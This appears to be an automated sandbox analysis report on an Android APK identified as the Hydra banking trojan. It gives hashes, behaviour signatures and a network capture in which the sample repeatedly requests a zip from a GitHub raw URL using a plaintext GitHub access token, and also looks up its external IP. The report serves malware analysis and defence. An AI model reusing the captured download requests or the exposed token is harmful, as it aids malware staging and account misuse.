Analysis
-
max time kernel
2271593s -
max time network
156s -
platform
android_x64 -
resource
android-x64-arm64-20231215-en -
resource tags
androidarch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20231215-enlocale:en-usos:android-11-x64system -
submitted
20-12-2023 00:23
Static task
static1
Behavioral task
behavioral1
Sample
73fcd12578ff36a3575898e5c2f6bf9bba7cfb40f936d2092c6f81ec7ebe8975.apk
Resource
android-x86-arm-20231215-en
Behavioral task
behavioral2
Sample
73fcd12578ff36a3575898e5c2f6bf9bba7cfb40f936d2092c6f81ec7ebe8975.apk
Resource
android-x64-20231215-en
Behavioral task
behavioral3
Sample
73fcd12578ff36a3575898e5c2f6bf9bba7cfb40f936d2092c6f81ec7ebe8975.apk
Resource
android-x64-arm64-20231215-en
General
-
Target
73fcd12578ff36a3575898e5c2f6bf9bba7cfb40f936d2092c6f81ec7ebe8975.apk
-
Size
6.4MB
-
MD5
168b29ef92c0931eb31531fa049adc58
-
SHA1
02813110ec1d35371b69613b4226246c4745aa95
-
SHA256
73fcd12578ff36a3575898e5c2f6bf9bba7cfb40f936d2092c6f81ec7ebe8975
-
SHA512
e5f3788607294a31ccf41a6fde470ac08916eccdaca57caeb8cf2acf3e710f011e245bf91422c60fdef1a6a58ba9456f8e47ae0cda8882b57710a8c0259b88ce
-
SSDEEP
196608:UIOdjjuuxyUmCaK/fK/8K+t8qLpZ/7xceP77J:UIujjuukNKHk8VnH/FP7t
Malware Config
Signatures
-
Hydra
Android banker and info stealer.
-
Hydra payload 1 IoCs
resource yara_rule behavioral3/memory/4614-0.dex family_hydra2 -
Makes use of the framework's Accessibility service 2 IoCs
Retrieves information displayed on the phone screen using AccessibilityService.
description ioc Process Framework service call android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfoByAccessibilityId com.dazgytun.vfohonn Framework service call android.accessibilityservice.IAccessibilityServiceConnection.findAccessibilityNodeInfosByViewId com.dazgytun.vfohonn -
Loads dropped Dex/Jar 1 IoCs
Runs executable file dropped to the device during analysis.
ioc pid Process /data/user/0/com.dazgytun.vfohonn/uIU7G8gH8F/HfgU98qGygiuyuI/base.apk.gFg88py1.F8u 4614 com.dazgytun.vfohonn -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 25 ip-api.com -
Reads information about phone network operator.
Processes
Network
-
Remote address:1.1.1.1:53Requestssl.google-analytics.comIN AResponsessl.google-analytics.comIN A142.250.200.40
-
Remote address:1.1.1.1:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.111.133
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 0B8E:391231:199826D:1AA0D6F:6582EA3B
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:21:46 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420107-LON
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078506.045871,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 38dadd63b496f3a581e2d497c7ee2a28a66b72cf
Expires: Wed, 20 Dec 2023 13:26:46 GMT
Source-Age: 44
-
Remote address:1.1.1.1:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /json HTTP/1.1
Authorization: 99f0249c171f2fa0
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: ip-api.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 313
Access-Control-Allow-Origin: *
X-Ttl: 56
X-Rl: 43
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 4D80:13C720:1624937:17117EE:6582EA6C
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:22:25 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7326-LHR
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078546.954509,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 641e5a3bbb27a71391ec10df75fd92b8a74547db
Expires: Wed, 20 Dec 2023 13:27:25 GMT
Source-Age: 37
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 4D80:13C720:1624937:17117EE:6582EA6C
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:22:45 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7324-LHR
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078566.972410,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 652c1e9532eadb886cae028c23b4967c18741ee9
Expires: Wed, 20 Dec 2023 13:27:45 GMT
Source-Age: 57
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 3948:2BBFA:F40C86:FD7927:6582EAA9
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:23:06 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7374-LHR
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078586.999627,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: eb0a4d0f2dc9163660b4066292d23a03c9b667d8
Expires: Wed, 20 Dec 2023 13:28:06 GMT
Source-Age: 16
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 3948:2BBFA:F40C86:FD7927:6582EAA9
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:23:26 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7346-LHR
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078606.012935,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 37e3135582b41e2eb8518a087a5e0c49c56f1431
Expires: Wed, 20 Dec 2023 13:28:26 GMT
Source-Age: 36
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 3948:2BBFA:F40C86:FD7927:6582EAA9
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:23:45 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7364-LHR
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1703078626.997617,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 52e1b8c0036877a210c90fd82cf4445169a6dfa8
Expires: Wed, 20 Dec 2023 13:28:45 GMT
Source-Age: 56
-
Remote address:185.199.110.133:443RequestGET /dyd1y/tor-files/main/all_tor.zip HTTP/1.1
Range: bytes=0-
Authorization: token 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
User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
Host: raw.githubusercontent.com
Connection: Keep-Alive
Accept-Encoding: gzip
ResponseHTTP/1.1 404 Not Found
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 7BDA:11EED1:1ACE3AD:1BD721F:6582EAF5
Accept-Ranges: bytes
Date: Wed, 20 Dec 2023 13:24:06 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600022-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1703078646.047731,VS0,VE128
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 181b588c3d5b667af7fa1a9aad108145d10b0af4
Expires: Wed, 20 Dec 2023 13:29:06 GMT
Source-Age: 0
-
695 B 40 B 1 1
-
695 B 40 B 1 1
-
4.9kB 8.9kB 24 23
-
1.3kB 40 B 1 1
-
530 B 40 B 1 1
-
1.3kB 5.8kB 8 7
-
1.4kB 5.8kB 11 11
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
412 B 622 B 4 3
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
923 B 40 B 2 1
-
11.5kB 10.1kB 31 38
-
1.4kB 1.8kB 10 9
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
1.4kB 1.8kB 10 9
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
1.4kB 1.8kB 10 9
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
1.4kB 1.9kB 11 10
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
1.4kB 1.8kB 10 9
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404 -
1.4kB 1.9kB 11 10
HTTP Request
GET https://raw.githubusercontent.com/dyd1y/tor-files/main/all_tor.zipHTTP Response
404
-
3.7kB 11
-
51 B 50 B 1 1
-
51 B 50 B 1 1
-
70 B 86 B 1 1
DNS Request
ssl.google-analytics.com
DNS Response
142.250.200.40
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.110.133185.199.109.133185.199.108.133185.199.111.133
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.4MB
MD5596ea494f59e8bf2768ce30a98a6ce06
SHA1bf7ef788bfbf671f23617d5322ad1a7db4a27123
SHA25613e0b11f7733a44824d0fd56034fcf43e2b73b3709dac4e7dcc97260952f1518
SHA512565b337eed6f8f476f91f41a94f9fa29042564be70570d81c10fb759b0a16db45db580d01ad642b95b3d686c40a53f27c1e0470f4007ec776ea75542169bac05
-
/data/user/0/com.dazgytun.vfohonn/uIU7G8gH8F/HfgU98qGygiuyuI/tmp-base.apk.gFg88py3526127071834448994.F8u
Filesize1.4MB
MD56ee5292878de973ee7bccefc99117078
SHA189ade14f507ecf86203c4c012b401e065a236ca5
SHA256b958a3c16e3874a2bf5718b8f111357f470ad752b4c141d979e8f5f5755a26e1
SHA5123d1ee2ca8bf9213240b2746eaedf41071da21a760e3c122d9c7eba2fbdd21cf1ed98799cb3295bb3ced8705fb46cdb4d7c936fd8575ce0f8dd066adbe120498b